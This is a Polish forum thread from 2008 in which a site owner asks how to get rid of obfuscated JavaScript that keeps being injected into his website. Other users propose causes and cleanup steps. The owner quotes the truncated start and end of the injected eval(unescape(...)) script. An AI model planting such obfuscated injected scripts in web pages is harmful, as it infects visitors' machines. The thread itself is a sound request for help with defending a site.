Jak usunąć wirus? Opcje

[bartek_fm]

Witam


Mam pytanie dotyczące wirusów, które zagnieździły się na stronie internetowej. Jak można się ich pozbyć? Czy są jakieś programy do wyszukiwania i kasowania wirusów na stronie? Czy rozwiązaniem problemu byłoby skasowanie i wgranie wszystkich plików na stronę jeszcze raz?

Z góry dziękuję za pomoc!

Bartek

Ten post edytował bartek_fm 20.02.2008, 22:24:42

[nowotny]

Same wirusy na tą stronę nie wlazły i się nie zagnieździły... to nie Animal Planet... :/ z resztą samo pojęcie jest jakieś koślawe... wirusy na stronie...? czyli co konkretnie...? link...?

[Jabol]

zbombarduj stronę bombami z napalmem! na pewno się nie ostaną.

[Jarod]

Czy rozwiązaniem problemu byłoby skasowanie i wgranie wszystkich plików na stronę jeszcze raz?

Tak. A swoją drogą to jaki program antywirusowy wykrył te wirusy i co to za wirusy?

[bartek_fm]

Co jakiś czas na stronie tworzy się dodatkowy kod - długi ciąg pewnych znaków - jak rozumiem odsyłacz do wirusów. Dotyczy to napewno katalogu głównego i kilku innych, np. forum. To siłą rzeczy trochę wpływa na kształ wizualny strony, ale przede wszystkim pojawia się informacja, że program wykrył trojana :/

Nadpisuję te pliki, ale co kilka dni dzieje się to samo. Zmieniłem hasło do konta na serwerze, ale nie pomogło :/

Ten post edytował bartek_fm 19.02.2008, 20:47:00

[Jarod]

Może korzystasz z jakiś gotowych systemów, które są dziurawe..
Sprawdzałeś gdzie te linki prowadzą? Do plików na innym serwerze?

Ten post edytował Jarod 19.02.2008, 21:02:29

[bartek_fm]

Trudno powiedzieć. To nie jest typowy kod html.

To jest początek "zbędnego" kodu":

Kod

<!-- [ abecf60df2c3f74043a0b86e23061d7b ] --><script>eval(unescape('function%20peFkDD%28hDIBu

itd...

I koniec:

Kod

2517%251e%2528%2509%251e%251e%253b%256c%256a%257e%27%29%3B'));</script><!-- end -->

Ten post edytował bartek_fm 19.02.2008, 21:33:24

[nowotny]

Za to jest to (niecałkiem) typowy kod javascript... dziurawą masz stronę że coś takiego ci działa...

[bartek_fm]

Może to być np. system newsów bez modułu antyspamowego CAPTCHA?

Ten post edytował bartek_fm 19.02.2008, 21:35:31

[l0ud]

- usunąć wszystkie pliki z serwera
- zmienić wszystkie hasła, do ftp, mysql, admina etc.
- wgrać wszystkie pliki od początku, jeżeli używasz np. phpbb jako forum, to wgraj najnowszą wersję

W większości przypadków to pomaga. Proponuję na przyszłość bardziej uważać z hasłami...

[jono]

Ale może być też inna sprawa. Jeżeli masz łącze internetowe np. przez EDGE (komórka) to operator kompresuje pliki html. Jak to robi? Ja byłem w szoku, ale w moich własnych stronach operator podczas przesyłania WPISAŁ zewnętrzny plik .css i wszystkie pliki .js do sekcji HEAD... więc możliwe, że są to Twoje własne pliki .js wpisane przez automat do treści strony..

[bartek_fm]

A to ciekawe akurat jest, ponieważ ten kod pojawia się w katalogach z jakimś systemem logowania: system newsów i forum. Chociaż również w katalogu głównym.

Ten post edytował bartek_fm 19.02.2008, 23:11:32

[LonelyKnight]

...a gdzie masz hosting? Jaka firma?

[bartek_fm]

Home.pl

Na komputerze też miałem wirusy, więc może przeszły z komputera na serwer (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

Ten post edytował bartek_fm 19.02.2008, 23:47:37

[LonelyKnight]

Nie, nie przeszły (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

http://forum.php.pl/index.php?showtopic=72...mp;#entry374196

[bartek_fm]

O widzisz. Rozwiązałeś ten problem? Jeśli tak, to w jaki sposób?

Ten post edytował bartek_fm 20.02.2008, 21:47:33

[l0ud]

Jakoś wątpię, żeby home.pl pozwalało sobie na modyfikację prywatnych plików. Dla mnie to jest włamanie - a najlepiej sobie z tym poradzić wykonując kroki, które napisałem wyżej.

Dla pewności, najlepiej by było, gdybyś umieścił gdzieś cały kod, który jest dopisywany do strony, a nie tylko fragment (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

[bartek_fm]

No własnie. Trudno powiedzieć, żeby to była wina usługodawcy.

[LonelyKnight]

O widzisz. Rozwiązałeś ten problem? Jeśli tak, to w jaki sposób?

A w taki, że wywaliłem ten kod i pozmieniałem ludziom hasła.

Btw. Strony, o których pisałem w tym drugim temacie używały, jeśli dobrze pamiętam, FCKeditor. Poza tym zero, powszechnie dostępnego kodu.

[bartek_fm]

Skasowałem wszystko z serwera. Pozmieniałem większość głównych haseł do konta i skryptów i po jakimś czasie znowi pojawiło się to samo :/

[l0ud]

W takim razie albo jest dziura (co raczej jest mało prawdopodobne przy popularniejszych skryptach), albo Ty lub inny admin macie zawirusowany czymś komputer i przesyła hasła gdzie indziej. Może używacie jakiejś pirackiej wersji total commandera? [oczywiście niczego nie sugeruję]